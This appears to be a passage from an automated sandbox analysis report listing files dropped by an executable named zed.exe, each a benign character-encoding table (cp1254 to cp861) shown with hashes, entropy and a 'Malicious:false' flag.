                                                                                                                                                                                                                                            SHA-256:31639CA96A4D3602D59BD012540FE179917E0561CB11A0D0B61F1B950EB76911
                                                                                                                                                                                                                                            SHA-512:3CE7BEABBE1A0CB946149D263D3317A8B791F6D72C49DEC4621E27F50CC359D8FA3EE97C03FF05D44E47DAA59DB87F219386467614B8B3FF8CC21AB3E3BED5E6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1254, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030016020390152008D008E008F..009020182019201C201D20222013201402DC21220161203A0153009D009E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF..00E000E100E200E300E40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.3385880810272774
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CfHVBUlJvRj7SOVbusZhAMiZyi77qdIn2hEeGlRhv6Mw6Kcv:MMlBVnrAMiwMmdInSEdhvrj7
                                                                                                                                                                                                                                            MD5:6DEA4179969D6C81C66C3B0F91B39769
                                                                                                                                                                                                                                            SHA1:7E2722576BFFABC3258C5EDB2D99FA2468D6A4B0
                                                                                                                                                                                                                                            SHA-256:47576CAE321C80E69C7F35205639680BF28010111E86E228ED191B084FAC6B91
                                                                                                                                                                                                                                            SHA-512:91CC626B6454517F06FB3616E9ED623D1A2A4BFE74AFA9885F00F6AEC835D8825A5587091B9D9AB0E5ABDA291FA3FE7CE87E2618E21EB2974D9118AE27B8A2FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1255, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030008A2039008C008D008E008F..009020182019201C201D20222013201402DC2122009A203A009C009D009E009F..00A000A100A200A320AA00A500A600A700A800A900D700AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE00BF..05B005B105B205B305B405B505B605B705B805B9000005BB05BC05BD05BE05BF..05C005C105C205C305F005F105F205F305F40000000000000000000000000000..05D005D105D205D305D40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.4033510023542655
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:C0HVBUlJvRj7SOVbusZhAMiZyi77q30pPE7Lym4cwGm+AMZjyG/JQIG/Y:XMlBVnrAMiwMm30FQLym4ys6Jg/Y
                                                                                                                                                                                                                                            MD5:D50DFAFEE5C605C5C00A25A9EEE4D4CF
                                                                                                                                                                                                                                            SHA1:7D51BC17931D3D809716C06E7F07C6011286A144
                                                                                                                                                                                                                                            SHA-256:29340EA8E5AD3532BF67FA77CC852F055081B1238925CB109908AA72804CCC04
                                                                                                                                                                                                                                            SHA-512:D0A9B422A1061D6239E442767069B987E33239FCBA9BACE677923888F5F8BD1DCAABC71B83A985A0A86A15DCC44316781665BBFBF24558FCB94FDA6783285BCB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1256, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC067E201A0192201E20262020202102C62030067920390152068606980688..06AF20182019201C201D20222013201406A921220691203A0153200C200D06BA..00A0060C00A200A300A400A500A600A700A800A906BE00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B9061B00BB00BC00BD00BE061F..06C1062106220623062406250626062706280629062A062B062C062D062E062F..063006310632063306340635063600D7063706380639063A0640064106420643..00E0064400E2064506460
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.344584404753015
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CNHVBUlJvRj7SOVbusZhAMiZyi77q8uWTfNL4wIBUioGndt:uMlBVnrAMiwMm8uWJDNIt
                                                                                                                                                                                                                                            MD5:CC3D24543FDD4644BBBD4AAB30CA71BC
                                                                                                                                                                                                                                            SHA1:8E2658E7F782F005411BCB8423BDFC3C68BDED14
                                                                                                                                                                                                                                            SHA-256:C15AB85438728BF2C60D72B1A66AF80E8B1CE3CF5EB08BA6421FF1B2F73ACDF4
                                                                                                                                                                                                                                            SHA-512:5ECABF820098F7D24AB806ADD9CA3E1087C29914FB2DE6BA3DC656234202DE3FDF80A7E9ED433CCB2149FF07184F74884CEB37A1B689E9E0C1402916F3E13AFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1257, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0083201E20262020202100882030008A2039008C00A802C700B8..009020182019201C201D20222013201400982122009A203A009C00AF02DB009F..00A0000000A200A300A4000000A600A700D800A9015600AB00AC00AD00AE00C6..00B000B100B200B300B400B500B600B700F800B9015700BB00BC00BD00BE00E6..0104012E0100010600C400C501180112010C00C90179011601220136012A013B..01600143014500D3014C00D500D600D701720141015A016A00DC017B017D00DF..0105012F0101010700E40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.2984943182702593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CKlHVBUlJvRj7SOVbusZhAMiZyi77qdIQ2jFvGNNykoxWi3/i:xMlBVnrAMiwMmdIQufkoxn3q
                                                                                                                                                                                                                                            MD5:12BCEAE6B6A5FAE5AE9C42F5998BA485
                                                                                                                                                                                                                                            SHA1:C9620DA0C763D2C3770386E69EE7E421BD1BA965
                                                                                                                                                                                                                                            SHA-256:29D93DEE7C01B2264778BC6B75F6EF76EA6AC53E9F4A334D83707229E7F482D2
                                                                                                                                                                                                                                            SHA-512:714BAF58462FB0E84A32D82C8FC2D63EDF78DF8CCE578391E2521737F94F860B5CCFE41B481E1D09879A6811FCFD8B98A2724DB1D15749BD5293A9B33BCAD071
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp1258, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0192201E20262020202102C62030008A20390152008D008E008F..009020182019201C201D20222013201402DC2122009A203A0153009D009E0178..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C2010200C400C500C600C700C800C900CA00CB030000CD00CE00CF..011000D1030900D300D401A000D600D700D800D900DA00DB00DC01AF030300DF..00E000E100E2010300E40
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.515546664597914
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CFyHVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBIqE18wDyV8mK:wyMlBVnrAMiwMm+VhE1LmK
                                                                                                                                                                                                                                            MD5:CE6D8A6542DC12D1783084FA4B2B63EA
                                                                                                                                                                                                                                            SHA1:5039A350C8E3E2C6F353B438B41BD0B6A7AB8069
                                                                                                                                                                                                                                            SHA-256:E5613C04D3D2EE44CCAD85AE53A37C257674491C540836E5D942BBCC4E4A8DB4
                                                                                                                                                                                                                                            SHA-512:E8C5CFB747486BBE0E567B6E87B59D5246D749A80C8F64F6669227C7FD849886F98A1F94451922AC099409AC14890F1A8B1E5F25EA584FDB1522ACE3AD0BE6A6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp437, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00A200A300A520A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.6177058818384693
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CjHVBUlJvRj7SOVbusZhAMiZyi77qSKOQFhWehDrq18wDyVKockoiH:WMlBVnrAMiwMmSKOQFhWeh3q1odH
                                                                                                                                                                                                                                            MD5:8EF3CBCA101F5777846D12D3C96A0A7D
                                                                                                                                                                                                                                            SHA1:5EC5418B861894E0F18EA15AA4414019815E2EA2
                                                                                                                                                                                                                                            SHA-256:A0415F14F5D72AD24E9C3A5C91517A0E3D22E1ADBC3505C0C6E918B961F7A07D
                                                                                                                                                                                                                                            SHA-512:FB14C88E61E5459B4A8706751D88D0A261AC6B4171F72912D87CE78A2BC97A821CCF5B53676FB229C08F9E557BE624F4DC649B722A906B9B7944ED2D5E7F9065
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp737, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..039103920393039403950396039703980399039A039B039C039D039E039F03A0..03A103A303A403A503A603A703A803A903B103B203B303B403B503B603B703B8..03B903BA03BB03BC03BD03BE03BF03C003C103C303C203C403C503C603C703C8..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03C903AC03AD03AE03CA03
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.451057608106102
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CsOHVBUlJvRj7SOVbusZhAMiZyi77qoo9ecL067J4ZNUPVw3PfA:AMlBVnrAMiwMm59T067KDLPo
                                                                                                                                                                                                                                            MD5:9656761FA02EA24773EAD3E5C4BDB975
                                                                                                                                                                                                                                            SHA1:366228F25392708FA799E9CC0830CE9917EF6CA7
                                                                                                                                                                                                                                            SHA-256:C3C6542E902DEC2C44DDCFD8B5CB7ABF309B0413A7CED1614DC0B20CF7C5E35F
                                                                                                                                                                                                                                            SHA-512:A6A44B9A2193D75764DC284BE53264E57BFEB2A221FD54B4577DD90752F69A45E6B9D293108A7AB895F347A24FD10AAE84954A043AB1F466F485D707D7412380
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp775, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..010600FC00E9010100E4012300E501070142011301560157012B017900C400C5..00C900E600C6014D00F6012200A2015A015B00D600DC00F800A300D800D700A4..0100012A00F3017B017C017A201D00A600A900AE00AC00BD00BC014100AB00BB..259125922593250225240104010C01180116256325512557255D012E01602510..25142534252C251C2500253C0172016A255A25542569256625602550256C017D..0105010D01190117012F01610173016B017E2518250C25882584258C25902580..00D300DF014C014300F500
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.3718781469586827
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:C9HVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBc+myS5LeQDTVwA:EMlBVnrAMiwMm+VeyS5SQn/
                                                                                                                                                                                                                                            MD5:2169EE726DCC011E6C3505D586C88FC3
                                                                                                                                                                                                                                            SHA1:094252AD0634787E2D7F0D28A448437054D359C7
                                                                                                                                                                                                                                            SHA-256:13DF611F429A9B331DA1B34F3C718CCCAF0BD4AB44F71A9C632197987B4D643B
                                                                                                                                                                                                                                            SHA-512:BC5831EF1C131095A22C76FFCB5C4217081AF796B60455BE2DE2E2689CFE1033F07E8B45449F77E7804A7D52CBCFB916B0B4639828E65B14475BB3367F47C8EE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp850, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00F800A300D800D70192..00E100ED00F300FA00F100D100AA00BA00BF00AE00AC00BD00BC00A100AB00BB..2591259225932502252400C100C200C000A9256325512557255D00A200A52510..25142534252C251C2500253C00E300C3255A25542569256625602550256C00A4..00F000D000CA00CB00C8013100CD00CE00CF2518250C2588258400A600CC2580..00D300DF00D400D200F500
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.4509005787389877
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CPHVBUlJvRj7SOVbusZhAMiZyi77q7EUsOtycwQIc+922V:mMlBVnrAMiwMmwvOtycwQIc+9R
                                                                                                                                                                                                                                            MD5:48402B424B5101BDEEB0192BBA96DB7D
                                                                                                                                                                                                                                            SHA1:C9EB93A37AF70F4134AA9CF05D914A30FB3201DD
                                                                                                                                                                                                                                            SHA-256:F3A18A8C7934F6586F023477E08D3F9D5EAD9A45E9E58A3F8D018AF9BB13F868
                                                                                                                                                                                                                                            SHA-512:4EE615605BFF3D94A7FC4FE23D8288F0F20F6792C8C69ECACABAE82F1A334D8417C5DFFC0DA3702E2DB09B7BE1E5FF19C6A0F460C9A5EC84D1856BB9C8061CA5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp852, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E4016F010700E7014200EB0150015100EE017900C40106..00C90139013A00F400F6013D013E015A015B00D600DC01640165014100D7010D..00E100ED00F300FA01040105017D017E0118011900AC017A010C015F00AB00BB..2591259225932502252400C100C2011A015E256325512557255D017B017C2510..25142534252C251C2500253C01020103255A25542569256625602550256C00A4..01110110010E00CB010F014700CD00CE011B2518250C258825840162016E2580..00D300DF00D40143014401
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.4277025591531864
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CoHVBUlJvRj7SOVbusZhAMiZyi77qLHVWjwk/rMZC032SLnD2JbD:hMlBVnrAMiwMmx8whM03VLDy
                                                                                                                                                                                                                                            MD5:8B8AA56F83BA750EB73FAE542E76FF1A
                                                                                                                                                                                                                                            SHA1:2F3C3BA4B854A7D6B0A3D27BC519EE66A042E05A
                                                                                                                                                                                                                                            SHA-256:E64FD2E639DA6F654D9BFBB2266F9432259A6A55941622F5CDDC3797E382EB0A
                                                                                                                                                                                                                                            SHA-512:8B4061176663F7AC01B3969D25F680B5870A8EAD864CFAD897F18E75409CE721E6CC367A88EBABAF72E77D4542EE1894F2A6EE47A43FB3D4C650CFA18DFD3D71
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp855, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0452040204530403045104010454040404550405045604060457040704580408..04590409045A040A045B040B045C040C045E040E045F040F044E042E044A042A..0430041004310411044604260434041404350415044404240433041300AB00BB..259125922593250225240445042504380418256325512557255D043904192510..25142534252C251C2500253C043A041A255A25542569256625602550256C00A4..043B041B043C041C043D041D043E041E043F2518250C25882584041F044F2580..042F044004200441042104
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.364496856690505
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CaHVBUlJvRj7SOVbusZhAMiZyi77qZpu6uUV5Dw5LeBCVHjzA:jMlBVnrAMiwMmyUVFw5SYdI
                                                                                                                                                                                                                                            MD5:BA52A031DE1B1A6ED1C41BED8946750C
                                                                                                                                                                                                                                            SHA1:BD54C0E2F62FD36675892A61FD8B340A56845D20
                                                                                                                                                                                                                                            SHA-256:B6CD5C6F2B54D89142679D599ED0A5DEE6955A3B3F6B6673E46AFE7A5A303CDC
                                                                                                                                                                                                                                            SHA-512:5F915AABE39F31CE9337B4B9B0239DF8ADA898D2D9F111DD09D97689DB89CF45B093AC187FC28484CFB213D14B0D8F58C5668D0A59726282D6F52D5D24697816
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp857, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE013100C400C5..00C900E600C600F400F600F200FB00F9013000D600DC00F800A300D8015E015F..00E100ED00F300FA00F100D1011E011F00BF00AE00AC00BD00BC00A100AB00BB..2591259225932502252400C100C200C000A9256325512557255D00A200A52510..25142534252C251C2500253C00E300C3255A25542569256625602550256C00A4..00BA00AA00CA00CB00C8000000CD00CE00CF2518250C2588258400A600CC2580..00D300DF00D400D200F500
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.506813480871637
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CMHVBUlJvRj7SOVbusZhAMiZyi77qij4Axlt49Y18wDyV8mK:VMlBVnrAMiwMm/g+9Y1LmK
                                                                                                                                                                                                                                            MD5:C416471B57FB894DC45D30C31B4BD2E2
                                                                                                                                                                                                                                            SHA1:BA378F8122280992AE51245A06814D8155564220
                                                                                                                                                                                                                                            SHA-256:804EFA345C5BBBAD2449C318A7A3F5B31F4234712AAD23DC49B3FB5AA33B7A57
                                                                                                                                                                                                                                            SHA-512:E7CDE706CFE573525C2DE319AD5783AE9D97C4F6D28B14A77A729F281540B0DAFAD4C14879EF76473BFDEBC38499C65CA228470983F2D1BC31938A91A2486522
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp860, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E300E000C100E700EA00CA00E800CD00D400EC00C300C2..00C900C000C800F400F500F200DA00F900CC00D500DC00A200A300D920A700D3..00E100ED00F300FA00F100D100AA00BA00BF00D200AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.5174672833207183
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:ClHVBUlJvRj7SOVbusZhAMiZyi77qZpORVPnA2Gm18wDyV8mK:8MlBVnrAMiwMmiVPAA1LmK
                                                                                                                                                                                                                                            MD5:4997979FD1692063E2B9AA9870E0BE4C
                                                                                                                                                                                                                                            SHA1:919012354B99BBEF4C85517E89A2C9CD340FCE49
                                                                                                                                                                                                                                            SHA-256:4B7E76AEB75289FACA76434EA6E9874E9504AD2BC3D8D47550EADBCC8294857E
                                                                                                                                                                                                                                            SHA-512:C122A1AE2DE79CB97E5989535B7478A76D905CDE60B01F80F5B84EDB9DF08BE6829E1811AF19608971DA048B8DA24F40DE0217A8054AC612EC2D8B3560500FBE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp861, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800D000F000DE00C400C5..00C900E600C600F400F600FE00FB00DD00FD00D600DC00F800A300D820A70192..00E100ED00F300FA00C100CD00D300DA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.5573268031592717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CdMHVBUlJvRj7SOVbusZhAMiZyi77q36AqE18wDyV8mK:iMMlBVnrAMiwMmq3E1LmK
                                                                                                                                                                                                                                            MD5:9B4D1B95B20BD67555517DCC3007B22A
                                                                                                                                                                                                                                            SHA1:2C0D6121DB49CDAB6FBAA81398BE2E44BE4E1110
                                                                                                                                                                                                                                            SHA-256:6C15CB256B1C22170292589C6F589E64E164EB36EC7E84F0BD48149BABB7C5FC
                                                                                                                                                                                                                                            SHA-512:34C3E401364D579E8AC7A4E1F1F7A29A84C62E1D5146D7664832639EA3997227DC4BAF1B64DC605E6574D680E61B55D0C69C329E35B1BEC41501FC68C5B634B7
                                                                                                                                                                                                                                            Malicious:false
